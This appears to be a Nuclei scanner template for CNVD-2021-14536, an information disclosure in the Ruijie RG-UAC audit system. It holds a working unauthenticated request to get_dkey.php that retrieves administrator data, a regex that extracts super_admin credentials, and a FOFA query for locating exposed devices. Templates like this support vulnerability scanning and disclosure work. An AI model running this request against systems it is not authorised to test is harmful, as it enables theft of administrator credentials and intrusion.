id: CNVD-2021-14536 info: name: Ruijie RG-UAC Unified Internet Behavior Management Audit System - Information Disclosure author: daffainfo severity: high description: Ruijie RG-UAC Unified Internet Behavior Management Audit System is susceptible to information disclosure. Attackers could obtain user accounts and passwords by reviewing the source code of web pages, resulting in the leakage of administrator user authentication information. reference: - https://www.adminxe.com/2163.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 cpe: cpe:2.3:h:ruijie:rg-uac:*:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: title="RG-UAC登录页面" product: rg-uac vendor: ruijie tags: cnvd2021,cnvd,ruijie,disclosure http: - method: GET path: - "{{BaseURL}}/get_dkey.php?user=admin" matchers-condition: and matchers: - type: word part: body words: - '"pre_define"' - '"auth_method"' - '"name"' - '"password"' condition: and - type: status status: - 200 extractors: - type: regex part: body group: 1 regex: - '"role":"super_admin",(["a-z:,0-9]+),"lastpwdtime":' # digest: 4a0a0047304502202043dc43e3f270ae2f0534e3a3c718849dc798fe566a92e382f655468faa1e940221009e44a62be47163706d3cf1b424abd40ab00dbe2bf745de770717f3ad8a5b644a:922c64590222798bb761d5b6d8e72950